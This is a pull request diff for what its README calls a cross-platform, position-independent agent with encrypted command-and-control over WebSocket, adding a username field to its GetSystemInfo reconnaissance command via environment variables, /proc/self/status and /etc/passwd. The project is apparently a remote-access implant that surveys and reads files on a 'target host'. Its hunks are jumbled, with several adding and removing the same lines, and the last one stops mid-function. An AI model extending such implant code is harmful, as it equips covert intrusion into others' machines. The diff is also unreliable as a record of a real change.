### PR TITLE
feat(environment): add GetUsername function to retrieve current user …

### DIFF
--- a/README.md
+++ b/README.md
@@ -49,7 +49,7 @@ This project solves that: a full C++23 codebase that compiles to position-indepe
 - **Cross-Platform** - 8 platforms (Windows, Linux, macOS, FreeBSD, Solaris, UEFI, Android, iOS) across 7 architectures (i386, x86_64, armv7a, aarch64, riscv32, riscv64, mips64) via direct syscalls
 - **TLS 1.3 + WebSocket** - Encrypted command-and-control over `wss://` using ChaCha20-Poly1305 AEAD (RFC 8446, RFC 6455)
 - **Binary Command Protocol** - 9 command types over WebSocket:
-  - `GetSystemInfo` - Machine UUID, hostname, CPU architecture, agent platform, OS version
+  - `GetSystemInfo` - Machine UUID, hostname, username, CPU architecture, agent platform, OS version
   - `GetDirectoryContent` - Directory listing with metadata
   - `GetFileContent` - File read at offset
   - `GetFileChunkHash` - SHA-256 hash of file chunk
@@ -385,6 +385,7 @@ Returns system identification info for the target host.
 |-----------------|--------------|---------------------------------------------------------------------|
 | `MachineUUID`   | `UUID` (16B) | Hardware/OS-level unique identifier                                 |
 | `Hostname`      | `CHAR[256]`  | Machine hostname (from env or `/etc/hostname`)                      |
+| `Username`      | `CHAR[256]`  | Current user name (env, `getuid()`+`/etc/passwd`, or numeric uid)    |
 | `Architecture`  | `CHAR[32]`   | CPU architecture (`x86_64`, `aarch64`, etc.) — compile-time         |
 | `AgentPlatform` | `CHAR[32]`   | OS target (`windows`, `linux`, `macos`, etc.) — compile-time        |
 | `OSVersion`     | `CHAR[128]`  | Runtime OS version (`Windows 10.0 Build 19045`, `Linux 6.1.0`)     |

--- a/docs/02-project-overview.md
+++ b/docs/02-project-overview.md
@@ -100,7 +100,7 @@ The agent supports 9 commands, dispatched via a function pointer array (see `doc
 
 | Command | What It Does |
 |---------|-------------|
-| `GetSystemInfo` | Collects hostname, OS version, machine UUID, CPU architecture |
+| `GetSystemInfo` | Collects hostname, username, OS version, machine UUID, CPU architecture |
 | `GetDirectoryContent` | Lists files and folders in a directory (like `ls` or `dir`) |
 | `GetFileContent` | Reads a file at a specified offset |
 | `GetFileChunkHash` | SHA-256 hash of a file chunk (for integrity checking) |

--- a/src/beacon/commandsHandler.cc
+++ b/src/beacon/commandsHandler.cc
@@ -111,8 +111,8 @@ VOID Handle_GetSystemInfoCommand([[maybe_unused]] PCHAR command, [[maybe_unused]
     Memory::Copy(*response + sizeof(UINT32), &info, sizeof(SystemInfo));
     Memory::Copy(*response + sizeof(UINT32) + sizeof(SystemInfo), &buildInfo, sizeof(AgentBuildInfo));
 
-    LOG_INFO("GetSystemInfo: hostname=%s, arch=%s, agent_platform=%s, os_version=%s, build=%u, commit=%s",
-             info.Hostname, info.Architecture, info.AgentPlatform, info.OSVersion, buildInfo.BuildNumber, buildInfo.CommitHash);
+    LOG_INFO("GetSystemInfo: hostname=%s, username=%s, arch=%s, agent_platform=%s, os_version=%s, build=%u, commit=%s",
+             info.Hostname, info.Username, info.Architecture, info.AgentPlatform, info.OSVersion, buildInfo.BuildNumber, buildInfo.CommitHash);
 }
 
 VOID Handle_GetDirectoryContentCommand([[maybe_unused]] PCHAR command, [[maybe_unused]] USIZE commandLength, PPCHAR response, PUSIZE responseLength, [[maybe_unused]] Context *context)

--- a/src/platform/kernel/freebsd/syscall.h
+++ b/src/platform/kernel/freebsd/syscall.h
@@ -77,6 +77,9 @@ constexpr USIZE SYS_WAIT4      = 7;
 constexpr USIZE SYS_KILL       = 37;
 constexpr USIZE SYS_PIPE       = 42;
 
+// User identity
+constexpr USIZE SYS_GETUID     = 24;
+
 // PTY operations
 constexpr USIZE SYS_POSIX_OPENPT = 504;
 

--- a/src/platform/kernel/linux/syscall.aarch64.h
+++ b/src/platform/kernel/linux/syscall.aarch64.h
@@ -11,8 +11,7 @@
 
 #include "core/types/primitives.h"
 
-// aarch64 uses *at syscalls - AT_FDCWD (-100) means use current working dir
-constexpr SSIZE AT_FDCWD = -100;
+// aarch64 uses *at syscalls; AT_FDCWD (-100) is defined in the common linux/syscall.h
 constexpr INT32 AT_REMOVEDIR = 0x200;
 
 // File I/O
@@ -21,9 +20,6 @@ constexpr USIZE SYS_WRITE = 64;
 constexpr USIZE SYS_OPENAT = 56;
 constexpr USIZE SYS_CLOSE = 57;
 constexpr USIZE SYS_LSEEK = 62;
-
-// User identity
-constexpr USIZE SYS_GETUID = 174;
 
 // Device I/O
 constexpr USIZE SYS_IOCTL = 29;

--- a/src/platform/kernel/linux/syscall.aarch64.h
+++ b/src/platform/kernel/linux/syscall.aarch64.h
@@ -22,6 +22,9 @@ constexpr USIZE SYS_OPENAT = 56;
 constexpr USIZE SYS_CLOSE = 57;
 constexpr USIZE SYS_LSEEK = 62;
 
+// User identity
+constexpr USIZE SYS_GETUID = 174;
+
 // Device I/O
 constexpr USIZE SYS_IOCTL = 29;
 

--- a/src/platform/kernel/linux/syscall.armv7a.h
+++ b/src/platform/kernel/linux/syscall.armv7a.h
@@ -19,6 +19,9 @@ constexpr USIZE SYS_CLOSE = 6;
 constexpr USIZE SYS_LSEEK = 19;
 constexpr USIZE SYS_OPENAT = 322;
 
+// User identity
+constexpr USIZE SYS_GETUID = 24;
+
 // Device I/O
 constexpr USIZE SYS_IOCTL = 54;
 

--- a/src/platform/kernel/linux/syscall.armv7a.h
+++ b/src/platform/kernel/linux/syscall.armv7a.h
@@ -19,9 +19,6 @@ constexpr USIZE SYS_CLOSE = 6;
 constexpr USIZE SYS_LSEEK = 19;
 constexpr USIZE SYS_OPENAT = 322;
 
-// User identity
-constexpr USIZE SYS_GETUID = 24;
-
 // Device I/O
 constexpr USIZE SYS_IOCTL = 54;
 

--- a/src/platform/kernel/linux/syscall.h
+++ b/src/platform/kernel/linux/syscall.h
@@ -168,6 +168,9 @@ constexpr INT32 WNOHANG = 1;
 // Invalid file descriptor
 constexpr SSIZE INVALID_FD = -1;
 
+// *at syscall constants
+constexpr SSIZE AT_FDCWD = -100;
+
 // =============================================================================
 // Linux Structures
 // =============================================================================

--- a/src/platform/kernel/linux/syscall.mips.h
+++ b/src/platform/kernel/linux/syscall.mips.h
@@ -17,8 +17,7 @@
 
 #include "core/types/primitives.h"
 
-// *at-style file descriptor base
-constexpr SSIZE AT_FDCWD = -100;
+// AT_FDCWD (-100) is defined in the common linux/syscall.h
 constexpr INT32 AT_REMOVEDIR = 0x200;
 
 // File I/O

--- a/src/platform/kernel/linux/syscall.mips64.h
+++ b/src/platform/kernel/linux/syscall.mips64.h
@@ -14,8 +14,7 @@
 
 #include "core/types/primitives.h"
 
-// *at-style file descriptor base
-constexpr SSIZE AT_FDCWD = -100;
+// AT_FDCWD (-100) is defined in the common linux/syscall.h
 constexpr INT32 AT_REMOVEDIR = 0x200;
 
 // File I/O

--- a/src/platform/kernel/linux/syscall.riscv32.h
+++ b/src/platform/kernel/linux/syscall.riscv32.h
@@ -12,8 +12,7 @@
 
 #include "core/types/primitives.h"
 
-// riscv32 uses *at syscalls - AT_FDCWD (-100) means use current working dir
-constexpr SSIZE AT_FDCWD = -100;
+// riscv32 uses *at syscalls; AT_FDCWD (-100) is defined in the common linux/syscall.h
 constexpr INT32 AT_REMOVEDIR = 0x200;
 
 // File I/O

--- a/src/platform/kernel/linux/syscall.riscv64.h
+++ b/src/platform/kernel/linux/syscall.riscv64.h
@@ -12,8 +12,7 @@
 
 #include "core/types/primitives.h"
 
-// riscv64 uses *at syscalls - AT_FDCWD (-100) means use current working dir
-constexpr SSIZE AT_FDCWD = -100;
+// riscv64 uses *at syscalls; AT_FDCWD (-100) is defined in the common linux/syscall.h
 constexpr INT32 AT_REMOVEDIR = 0x200;
 
 // File I/O

--- a/src/platform/kernel/linux/syscall.x86_64.h
+++ b/src/platform/kernel/linux/syscall.x86_64.h
@@ -18,6 +18,9 @@ constexpr USIZE SYS_CLOSE = 3;
 constexpr USIZE SYS_LSEEK = 8;
 constexpr USIZE SYS_OPENAT = 257;
 
+// User identity
+constexpr USIZE SYS_GETUID = 102;
+
 // Device I/O
 constexpr USIZE SYS_IOCTL = 16;
 

--- a/src/platform/kernel/linux/syscall.x86_64.h
+++ b/src/platform/kernel/linux/syscall.x86_64.h
@@ -18,9 +18,6 @@ constexpr USIZE SYS_CLOSE = 3;
 constexpr USIZE SYS_LSEEK = 8;
 constexpr USIZE SYS_OPENAT = 257;
 
-// User identity
-constexpr USIZE SYS_GETUID = 102;
-
 // Device I/O
 constexpr USIZE SYS_IOCTL = 16;
 

--- a/src/platform/kernel/macos/syscall.h
+++ b/src/platform/kernel/macos/syscall.h
@@ -74,6 +74,9 @@ constexpr USIZE SYS_WAIT4      = SYSCALL_CLASS_UNIX | 7;
 constexpr USIZE SYS_KILL       = SYSCALL_CLASS_UNIX | 37;
 constexpr USIZE SYS_PIPE       = SYSCALL_CLASS_UNIX | 42;
 
+// User identity
+constexpr USIZE SYS_GETUID     = SYSCALL_CLASS_UNIX | 24;
+
 // =============================================================================
 // POSIX/BSD Constants
 // =============================================================================

--- a/src/platform/kernel/solaris/syscall.h
+++ b/src/platform/kernel/solaris/syscall.h
@@ -90,6 +90,9 @@ constexpr USIZE SYS_EXECVE     = 59;
 constexpr USIZE SYS_PGRPSYS    = 39;   // Multiplexed: subcode 3 = setsid
 constexpr USIZE SYS_KILL       = 37;
 constexpr USIZE SYS_PIPE       = 42;
+
+// User identity
+constexpr USIZE SYS_GETUID     = 24;
 constexpr USIZE SYS_WAITID     = 107;
 
 // Forksys subcodes

--- a/src/platform/system/README.md
+++ b/src/platform/system/README.md
@@ -125,21 +125,21 @@ if (n >= 'a' && n <= 'z') n -= 32;
 
 The name boundary is detected by checking for `=` after the matched characters.
 
-### POSIX: extern environ
+### POSIX: /proc/self/environ
 
-POSIX provides the `environ` pointer — a null-terminated array of `"NAME=VALUE"` C strings. The runtime walks this array directly without calling `getenv()`.
+On Linux/Android the runtime reads `/proc/self/environ` — a null-terminated block of `"NAME=VALUE"` strings — directly via `openat`/`read` syscalls, without calling `getenv()`. On macOS/iOS/FreeBSD/Solaris the environment layer is unavailable.
 
 ## Platform Identification
 
-The `Environment` class provides compile-time and runtime system identification via `GetAgentPlatform()`, `GetOSVersion()`, `GetHostname()`, and `GetArchitecture()`.
+The `Environment` class provides compile-time and runtime system identification via `GetAgentPlatform()`, `GetOSVersion()`, `GetHostname()`, `GetUsername()`, and `GetArchitecture()`.
 
-| Platform | OS Version Source | Hostname Source |
-|---|---|---|
-| **Windows** | PEB `OSMajorVersion`/`OSMinorVersion`/`OSBuildNumber` | `COMPUTERNAME` env var |
-| **Linux/Android** | `uname` syscall | `HOSTNAME` env var / `/etc/hostname` |
-| **macOS/iOS/FreeBSD** | `sysctl` (kern.ostype + kern.osrelease) | `sysctl` kern.hostname |
-| **Solaris** | `utssys` → `/etc/release` fallback | `utssys` nodename → `/etc/nodename` |
-| **UEFI** | `"uefi"` (static) | empty (no hostname concept) |
+| Platform | OS Version Source | Hostname Source | Username Source |
+|---|---|---|---|
+| **Windows** | PEB `OSMajorVersion`/`OSMinorVersion`/`OSBuildNumber` | `COMPUTERNAME` env var | `USERNAME` env var |
+| **Linux/Android** | `uname` syscall | `HOSTNAME` env var / `/etc/hostname` | `USER`/`LOGNAME` env → uid (`/proc/self/status`) + `/etc/passwd` |
+| **macOS/iOS/FreeBSD** | `sysctl` (kern.ostype + kern.osrelease) | `sysctl` kern.hostname | `getuid()` + `/etc/passwd` (numeric uid if not in passwd) |
+| **Solaris** | `utssys` → `/etc/release` fallback | `utssys` nodename → `/etc/nodename` | `getuid()` + `/etc/passwd` |
+| **UEFI** | `"uefi"` (static) | empty (no hostname concept) | empty (no user concept) |
 
 ## Pseudo-Terminal (PTY) Creation
 
@@ -265,6 +265,7 @@ End-of-prompt detection: `'>'` on Windows (cmd.exe), `'$'` on POSIX (sh).
 | MachineID | SMBIOS UUID | `/etc/machine-id`/`sysctl`/`boot_id` | Stub |
 | Environment | PEB block walk | `/proc/self/environ` | Stub |
 | Hostname | `COMPUTERNAME` env var | env/file/`sysctl`/`utssys` | Stub |
+| Username | `USERNAME` env var | env/`getuid()`+`/etc/passwd`/uid | Stub |
 | OSVersion | PEB version fields | `uname`/`sysctl`/`utssys`+`/etc/release` | `"uefi"` |
 | Pipe | `CreatePipe` | `pipe()`/`pipe2()` | Not supported |
 | Process | `CreateProcessW` | `fork()`+`execve()` | Not supported |

--- a/src/platform/system/environment.h
+++ b/src/platform/system/environment.h
@@ -86,6 +86,21 @@ public:
 	[[nodiscard]] static Result<USIZE, Error> GetHostname(Span<CHAR> buffer) noexcept;
 
 	/**
+	 * @brief Retrieves the current user name.
+	 *
+	 * @param buffer Output buffer to receive the username string.
+	 * @return Ok(length) on success, Err on failure.
+	 *
+	 * @details Retrieves the username using platform-specific methods:
+	 * - Windows: USERNAME environment variable from PEB
+	 * - Linux/Android: USER/LOGNAME environment variable
+	 * - macOS/iOS/FreeBSD/Solaris: getuid() syscall + /etc/passwd lookup
+	 *   (the environment layer is unavailable here)
+	 * - UEFI: returns Err (no user concept)
+	 */
+	[[nodiscard]] static Result<USIZE, Error> GetUsername(Span<CHAR> buffer) noexcept;
+
+	/**
 	 * @brief Retrieves the compile-time CPU architecture string.
 	 *
 	 * @param buffer Output buffer to receive the architecture string.

--- a/src/platform/system/environment.h
+++ b/src/platform/system/environment.h
@@ -4,15 +4,16 @@
  *
  * @details Provides position-independent access to environment variables and
  * platform identification across all supported targets. On Windows, variables
- * are read from the PEB environment block. On Linux, macOS, and Solaris,
- * variables are retrieved from the process environ pointer. On UEFI,
- * GetVariable() always returns 0 as environment variables are not available.
- * No .rdata dependencies.
+ * are read from the PEB environment block. On Linux/Android, variables are read
+ * from /proc/self/environ. On macOS/iOS/FreeBSD/Solaris the environment layer
+ * is unavailable (GetVariable() returns 0). On UEFI, GetVariable() always
+ * returns 0 as environment variables are not available. No .rdata dependencies.
  *
  * Platform and system identification:
  * - GetAgentPlatform(): compile-time OS target string (e.g. "windows", "linux")
  * - GetOSVersion(): runtime OS version string (e.g. "Windows 10.0 Build 19045")
  * - GetHostname(): machine hostname from OS environment
+ * - GetUsername(): current user name (env, getuid()+/etc/passwd, or numeric uid)
  * - GetArchitecture(): compile-time CPU architecture string (e.g. "x86_64")
  */
 

--- a/src/platform/system/posix/environment.cc
+++ b/src/platform/system/posix/environment.cc
@@ -354,6 +354,10 @@ Result<USIZE, Error> Environment::GetOSVersion(Span<CHAR> buffer) noexcept
 // file-open/read pattern used for /etc/hostname in GetHostname below.
 static Result<USIZE, Error> ResolveUsernameFromPasswd(Span<CHAR> buffer)
 {
+	if (buffer.Size() == 0)
+		return Result<USIZE, Error>::Err(Error(Error::None));
+	buffer.Data()[0] = '\0';
+
 	UINT32 uid = (UINT32)System::Call(SYS_GETUID);
 
 	const CHAR *path = "/etc/passwd";

--- a/src/platform/system/posix/environment.cc
+++ b/src/platform/system/posix/environment.cc
@@ -354,7 +354,7 @@ Result<USIZE, Error> Environment::GetOSVersion(Span<CHAR> buffer) noexcept
 // lives in Directory Service rather than /etc/passwd, and Android has no passwd
 // file, so those fall through to the numeric uid. Platform-independent: uses
 // only file I/O syscalls + UIntToStr.
-static Result<USIZE, Error> LookupUsernameByUid(UINT32 uid, Span<CHAR> buffer)
+static Result<USIZE, Error> LookupUsernameByUid(UINT32 uid, Span<CHAR> buffer) noexcept
 {
 	if (buffer.Size() == 0)
 		return Result<USIZE, Error>::Err(Error(Error::None));
@@ -443,9 +443,8 @@ static Result<USIZE, Error> LookupUsernameByUid(UINT32 uid, Span<CHAR> buffer)
 
 #if defined(PLATFORM_LINUX) || defined(PLATFORM_ANDROID)
 // Read the real uid from /proc/self/status (the "Uid:" line). Avoids needing a
-// getuid syscall number per Linux architecture (including MIPS). Returns the uid
-// or (UINT32)-1 on failure.
-static UINT32 ReadUidFromProcStatus() noexcept
+// getuid syscall number per Linux architecture (including MIPS).
+static Result<UINT32, Error> ReadUidFromProcStatus() noexcept
 {
 	const CHAR *path = "/proc/self/status";
 #if defined(ARCHITECTURE_AARCH64) || defined(ARCHITECTURE_RISCV64) || defined(ARCHITECTURE_RISCV32)
@@ -456,13 +455,13 @@ static UINT32 ReadUidFromProcStatus() noexcept
 		fd = System::Call(SYS_OPENAT, (USIZE)-100, (USIZE)path, 0, 0);
 #endif
 	if (fd < 0)
-		return (UINT32)-1;
+		return Result<UINT32, Error>::Err(Error(Error::None));
 
 	CHAR status[4096];
 	SSIZE n = System::Call(SYS_READ, (USIZE)fd, (USIZE)status, sizeof(status) - 1);
 	System::Call(SYS_CLOSE, (USIZE)fd);
 	if (n <= 0)
-		return (UINT32)-1;
+		return Result<UINT32, Error>::Err(Error(Error::None));
 	status[n] = '\0';
 
 	// Find the line starting with "Uid:" and parse the first (real) uid.
@@ -483,14 +482,16 @@ static UINT32 ReadUidFromProcStatus() noexcept
 				uid = uid * 10 + (UINT32)(*q - '0');
 				q++;
 			}
-			return haveDigit ? uid : (UINT32)-1;
+			if (!haveDigit)
+				return Result<UINT32, Error>::Err(Error(Error::None));
+			return Result<UINT32, Error>::Ok(uid);
 		}
 		while (p < end && *p != '\n')
 			p++;
 		if (p < end)
 			p++;
 	}
-	return (UINT32)-1;
+	return Result<UINT32, Error>::Err(Error(Error::None));
 }
 #endif
 
@@ -507,9 +508,10 @@ Result<USIZE, Error> Environment::GetUsername(Span<CHAR> buffer) noexcept
 	// 2. Resolve by uid: /etc/passwd lookup, falling back to the uid as a string.
 #if defined(PLATFORM_LINUX) || defined(PLATFORM_ANDROID)
 	// Read the uid from /proc (no getuid syscall needed; works on every arch).
-	UINT32 uid = ReadUidFromProcStatus();
-	if (uid == (UINT32)-1)
+	auto uidResult = ReadUidFromProcStatus();
+	if (!uidResult)
 		return Result<USIZE, Error>::Err(Error(Error::None));
+	UINT32 uid = uidResult.Value();
 #else
 	// macOS/iOS/FreeBSD/Solaris: getuid() (no /proc; env layer is stubbed here).
 	UINT32 uid = (UINT32)System::Call(SYS_GETUID);

--- a/src/platform/system/posix/environment.cc
+++ b/src/platform/system/posix/environment.cc
@@ -348,97 +348,155 @@ Result<USIZE, Error> Environment::GetOSVersion(Span<CHAR> buffer) noexcept
 	return Result<USIZE, Error>::Err(Error(Error::None));
 }
 
-#if defined(PLATFORM_MACOS) || defined(PLATFORM_IOS) || defined(PLATFORM_FREEBSD) || defined(PLATFORM_SOLARIS)
-// Resolve the current username via getuid() + /etc/passwd. Used on platforms
-// where the environment layer is stubbed (no /proc/self/environ). Mirrors the
-// file-open/read pattern used for /etc/hostname in GetHostname below.
-static Result<USIZE, Error> ResolveUsernameFromPasswd(Span<CHAR> buffer)
+// Resolve a uid to a username via /etc/passwd, falling back to the uid formatted
+// as a decimal string when no passwd entry matches. passwd is authoritative on
+// Linux/FreeBSD/Solaris (returns the real name); on macOS/iOS the login user
+// lives in Directory Service rather than /etc/passwd, and Android has no passwd
+// file, so those fall through to the numeric uid. Platform-independent: uses
+// only file I/O syscalls + UIntToStr.
+static Result<USIZE, Error> LookupUsernameByUid(UINT32 uid, Span<CHAR> buffer)
 {
 	if (buffer.Size() == 0)
 		return Result<USIZE, Error>::Err(Error(Error::None));
-	buffer.Data()[0] = '\0';
-
-	UINT32 uid = (UINT32)System::Call(SYS_GETUID);
 
 	const CHAR *path = "/etc/passwd";
+#if defined(ARCHITECTURE_AARCH64) || defined(ARCHITECTURE_RISCV64) || defined(ARCHITECTURE_RISCV32)
 	SSIZE fd = System::Call(SYS_OPENAT, (USIZE)AT_FDCWD, (USIZE)path, 0 /*O_RDONLY*/, 0);
+#else
+	SSIZE fd = System::Call(SYS_OPEN, (USIZE)path, 0, 0);
 	if (fd < 0)
-		fd = System::Call(SYS_OPEN, (USIZE)path, 0, 0);
-	if (fd < 0)
-		return Result<USIZE, Error>::Err(Error(Error::None));
+		fd = System::Call(SYS_OPENAT, (USIZE)AT_FDCWD, (USIZE)path, 0, 0);
+#endif
 
-	// Read the whole file into a stack buffer.
-	CHAR pwd[8192];
-	USIZE total = 0;
-	while (total < sizeof(pwd) - 1)
+	if (fd >= 0)
 	{
-		SSIZE n = System::Call(SYS_READ, (USIZE)fd, (USIZE)(pwd + total), sizeof(pwd) - 1 - total);
-		if (n <= 0)
-			break;
-		total += (USIZE)n;
+		// Read the whole file into a stack buffer.
+		CHAR pwd[8192];
+		USIZE total = 0;
+		while (total < sizeof(pwd) - 1)
+		{
+			SSIZE n = System::Call(SYS_READ, (USIZE)fd, (USIZE)(pwd + total), sizeof(pwd) - 1 - total);
+			if (n <= 0)
+				break;
+			total += (USIZE)n;
+		}
+		System::Call(SYS_CLOSE, (USIZE)fd);
+		pwd[total] = '\0';
+
+		// Walk lines of the form "name:passwd:uid:gid:...".
+		CHAR *line = pwd;
+		CHAR *end = pwd + total;
+		while (line < end)
+		{
+			CHAR *eol = line;
+			while (eol < end && *eol != '\n')
+				eol++;
+
+			CHAR *p = line;
+			// Field 0: name
+			CHAR *nameStart = p;
+			while (p < eol && *p != ':')
+				p++;
+			CHAR *nameEnd = p;
+			// Skip field 1 (passwd)
+			if (p < eol && *p == ':')
+				p++;
+			while (p < eol && *p != ':')
+				p++;
+			// Field 2: uid
+			if (p < eol && *p == ':')
+				p++;
+			CHAR *uidStart = p;
+			while (p < eol && *p != ':')
+				p++;
+			CHAR *uidEnd = p;
+
+			// Parse the uid field as decimal and compare.
+			BOOL valid = (uidEnd > uidStart);
+			UINT32 lineUid = 0;
+			for (CHAR *d = uidStart; d < uidEnd && valid; d++)
+			{
+				if (*d < '0' || *d > '9')
+					valid = false;
+				else
+					lineUid = lineUid * 10 + (UINT32)(*d - '0');
+			}
+
+			if (valid && lineUid == uid && nameEnd > nameStart)
+			{
+				USIZE nameLen = (USIZE)(nameEnd - nameStart);
+				if (nameLen >= buffer.Size())
+					nameLen = buffer.Size() - 1;
+				Memory::Copy(buffer.Data(), nameStart, nameLen);
+				buffer.Data()[nameLen] = '\0';
+				return Result<USIZE, Error>::Ok(nameLen);
+			}
+
+			line = (eol < end) ? eol + 1 : eol;
+		}
 	}
+
+	// No matching passwd entry (macOS Directory Service, Android, unmatched):
+	// report the numeric uid (always non-empty).
+	return Result<USIZE, Error>::Ok(StringUtils::UIntToStr(uid, buffer));
+}
+
+#if defined(PLATFORM_LINUX) || defined(PLATFORM_ANDROID)
+// Read the real uid from /proc/self/status (the "Uid:" line). Avoids needing a
+// getuid syscall number per Linux architecture (including MIPS). Returns the uid
+// or (UINT32)-1 on failure.
+static UINT32 ReadUidFromProcStatus() noexcept
+{
+	const CHAR *path = "/proc/self/status";
+#if defined(ARCHITECTURE_AARCH64) || defined(ARCHITECTURE_RISCV64) || defined(ARCHITECTURE_RISCV32)
+	SSIZE fd = System::Call(SYS_OPENAT, (USIZE)-100, (USIZE)path, 0, 0);
+#else
+	SSIZE fd = System::Call(SYS_OPEN, (USIZE)path, 0, 0);
+	if (fd < 0)
+		fd = System::Call(SYS_OPENAT, (USIZE)-100, (USIZE)path, 0, 0);
+#endif
+	if (fd < 0)
+		return (UINT32)-1;
+
+	CHAR status[4096];
+	SSIZE n = System::Call(SYS_READ, (USIZE)fd, (USIZE)status, sizeof(status) - 1);
 	System::Call(SYS_CLOSE, (USIZE)fd);
-	pwd[total] = '\0';
+	if (n <= 0)
+		return (UINT32)-1;
+	status[n] = '\0';
 
-	// Walk lines of the form "name:passwd:uid:gid:...".
-	CHAR *line = pwd;
-	CHAR *end = pwd + total;
-	while (line < end)
+	// Find the line starting with "Uid:" and parse the first (real) uid.
+	CHAR *p = status;
+	CHAR *end = status + n;
+	while (p < end)
 	{
-		CHAR *eol = line;
-		while (eol < end && *eol != '\n')
-			eol++;
-
-		CHAR *p = line;
-		// Field 0: name
-		CHAR *nameStart = p;
-		while (p < eol && *p != ':')
-			p++;
-		CHAR *nameEnd = p;
-		// Skip field 1 (passwd)
-		if (p < eol && *p == ':')
-			p++;
-		while (p < eol && *p != ':')
-			p++;
-		// Field 2: uid
-		if (p < eol && *p == ':')
-			p++;
-		CHAR *uidStart = p;
-		while (p < eol && *p != ':')
-			p++;
-		CHAR *uidEnd = p;
-
-		// Parse the uid field as decimal and compare to getuid().
-		BOOL valid = (uidEnd > uidStart);
-		UINT32 lineUid = 0;
-		for (CHAR *d = uidStart; d < uidEnd && valid; d++)
+		if (p + 4 <= end && p[0] == 'U' && p[1] == 'i' && p[2] == 'd' && p[3] == ':')
 		{
-			if (*d < '0' || *d > '9')
-				valid = false;
-			else
-				lineUid = lineUid * 10 + (UINT32)(*d - '0');
+			CHAR *q = p + 4;
+			while (q < end && (*q == '\t' || *q == ' '))
+				q++;
+			UINT32 uid = 0;
+			BOOL haveDigit = false;
+			while (q < end && *q >= '0' && *q <= '9')
+			{
+				haveDigit = true;
+				uid = uid * 10 + (UINT32)(*q - '0');
+				q++;
+			}
+			return haveDigit ? uid : (UINT32)-1;
 		}
-
-		if (valid && lineUid == uid && nameEnd > nameStart)
-		{
-			USIZE nameLen = (USIZE)(nameEnd - nameStart);
-			if (nameLen >= buffer.Size())
-				nameLen = buffer.Size() - 1;
-			Memory::Copy(buffer.Data(), nameStart, nameLen);
-			buffer.Data()[nameLen] = '\0';
-			return Result<USIZE, Error>::Ok(nameLen);
-		}
-
-		line = (eol < end) ? eol + 1 : eol;
+		while (p < end && *p != '\n')
+			p++;
+		if (p < end)
+			p++;
 	}
-
-	return Result<USIZE, Error>::Err(Error(Error::None));
+	return (UINT32)-1;
 }
 #endif
 
 Result<USIZE, Error> Environment::GetUsername(Span<CHAR> buffer) noexcept
 {
-	// Try USER / LOGNAME first (works on Linux/Android via /proc/self/environ).
+	// 1. USER / LOGNAME from the environment (login sessions on Linux/Android).
 	USIZE len = Environment::GetVariable("USER", buffer);
 	if (len > 0)
 		return Result<USIZE, Error>::Ok(len);
@@ -446,19 +504,17 @@ Result<USIZE, Error> Environment::GetUsername(Span<CHAR> buffer) noexcept
 	if (len > 0)
 		return Result<USIZE, Error>::Ok(len);
 
-#if defined(PLATFORM_MACOS) || defined(PLATFORM_IOS) || defined(PLATFORM_FREEBSD) || defined(PLATFORM_SOLARIS)
-	// Environment layer is stubbed here: resolve via getuid() + /etc/passwd.
-	return ResolveUsernameFromPasswd(buffer);
-#elif defined(PLATFORM_ANDROID)
-	// Android has no USER/LOGNAME environment and no /etc/passwd; report the
-	// numeric uid (the app sandbox identity) via getuid().
-	{
-		UINT32 uid = (UINT32)System::Call(SYS_GETUID);
-		return Result<USIZE, Error>::Ok(StringUtils::UIntToStr(uid, buffer));
-	}
+	// 2. Resolve by uid: /etc/passwd lookup, falling back to the uid as a string.
+#if defined(PLATFORM_LINUX) || defined(PLATFORM_ANDROID)
+	// Read the uid from /proc (no getuid syscall needed; works on every arch).
+	UINT32 uid = ReadUidFromProcStatus();
+	if (uid == (UINT32)-1)
+		return Result<USIZE, Error>::Err(Error(Error::None));
 #else
-	return Result<USIZE, Error>::Err(Error(Error::None));
+	// macOS/iOS/FreeBSD/Solaris: getuid() (no /proc; env layer is stubbed here).
+	UINT32 uid = (UINT32)System::Call(SYS_GETUID);
 #endif
+	return LookupUsernameByUid(uid, buffer);
 }
 
 Result<USIZE, Error> Environment::GetHostname(Span<CHAR> buffer) noexcept

--- a/src/platform/system/posix/environment.cc
+++ b/src/platform/system/posix/environment.cc
@@ -348,6 +348,108 @@ Result<USIZE, Error> Environment::GetOSVersion(Span<CHAR> buffer) noexcept
 	return Result<USIZE, Error>::Err(Error(Error::None));
 }
 
+#if defined(PLATFORM_MACOS) || defined(PLATFORM_IOS) || defined(PLATFORM_FREEBSD) || defined(PLATFORM_SOLARIS)
+// Resolve the current username via getuid() + /etc/passwd. Used on platforms
+// where the environment layer is stubbed (no /proc/self/environ). Mirrors the
+// file-open/read pattern used for /etc/hostname in GetHostname below.
+static Result<USIZE, Error> ResolveUsernameFromPasswd(Span<CHAR> buffer)
+{
+	UINT32 uid = (UINT32)System::Call(SYS_GETUID);
+
+	const CHAR *path = "/etc/passwd";
+	SSIZE fd = System::Call(SYS_OPENAT, (USIZE)AT_FDCWD, (USIZE)path, 0 /*O_RDONLY*/, 0);
+	if (fd < 0)
+		fd = System::Call(SYS_OPEN, (USIZE)path, 0, 0);
+	if (fd < 0)
+		return Result<USIZE, Error>::Err(Error(Error::None));
+
+	// Read the whole file into a stack buffer.
+	CHAR pwd[8192];
+	USIZE total = 0;
+	while (total < sizeof(pwd) - 1)
+	{
+		SSIZE n = System::Call(SYS_READ, (USIZE)fd, (USIZE)(pwd + total), sizeof(pwd) - 1 - total);
+		if (n <= 0)
+			break;
+		total += (USIZE)n;
+	}
+	System::Call(SYS_CLOSE, (USIZE)fd);
+	pwd[total] = '\0';
+
+	// Walk lines of the form "name:passwd:uid:gid:...".
+	CHAR *line = pwd;
+	CHAR *end = pwd + total;
+	while (line < end)
+	{
+		CHAR *eol = line;
+		while (eol < end && *eol != '\n')
+			eol++;
+
+		CHAR *p = line;
+		// Field 0: name
+		CHAR *nameStart = p;
+		while (p < eol && *p != ':')
+			p++;
+		CHAR *nameEnd = p;
+		// Skip field 1 (passwd)
+		if (p < eol && *p == ':')
+			p++;
+		while (p < eol && *p != ':')
+			p++;
+		// Field 2: uid
+		if (p < eol && *p == ':')
+			p++;
+		CHAR *uidStart = p;
+		while (p < eol && *p != ':')
+			p++;
+		CHAR *uidEnd = p;
+
+		// Parse the uid field as decimal and compare to getuid().
+		BOOL valid = (uidEnd > uidStart);
+		UINT32 lineUid = 0;
+		for (CHAR *d = uidStart; d < uidEnd && valid; d++)
+		{
+			if (*d < '0' || *d > '9')
+				valid = false;
+			else
+				lineUid = lineUid * 10 + (UINT32)(*d - '0');
+		}
+
+		if (valid && lineUid == uid && nameEnd > nameStart)
+		{
